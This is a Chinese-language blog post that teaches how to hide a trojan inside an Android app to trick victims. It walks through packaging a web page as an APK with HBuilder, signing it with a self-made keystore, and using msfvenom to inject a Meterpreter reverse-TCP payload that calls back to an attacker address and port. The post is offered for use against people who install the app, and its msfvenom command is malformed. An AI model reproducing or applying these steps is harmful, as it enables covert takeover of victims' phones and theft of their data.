在网络安全中,社会工程学已经是一种最为致命的攻击手段。常常让人出其不意,今天来看看如何利用 木马伪装的艺术来进行社会工程学攻击。

伪装的艺术

对安卓shell的伪装

利用 HBuilder将web页面打包成 APP
文件-新建-移动APP
配置APP项目

需要注意是 页面入口便是APP启动后要进入的页面。

设置图标


需要注意的是图标格式为 PNG

设置启动页

打包APP

右键项目-发行-发行原生APP

关于签名
如果你不懂关于androdi的前面,建议使用公用证书。但是需要实名认证。于是我这里用了自己的证书!

自建证书

Kali下我们利用下面命令建立证书。

keytool -genkey -alias testalias -keyalg RSA -keysize 2048 -validity 36500 -keystore kali.keystore

这样我们便创建了一个名为 kali.keystore的证书,输入证书的密码,位置等信息打包即可!

下载app

发行-查看APP打包状态 下载已经打包好的app

添加后门

msfvenom -p -x kali.apk android/meterpreter/reverse_tcp LHOST=192.168.232.195 LPORT=5555 R > kali1.apk

参数说明:
-x 原生APP
kali1.apk 最后生成含有后门的app

安装app

运行app

就这样,当你还在不断的欣赏小视频的同时,别人就会得到你手机的权限。
运行app后 获得shell

需要注意的是,由于kali的版本不同或者java版本问题的差异,在实际中你可能会遇到各种坑。但是不要放弃总会成功的!

Last modification:December 6th, 2020 at 09:53 pm
正在沿街乞讨中……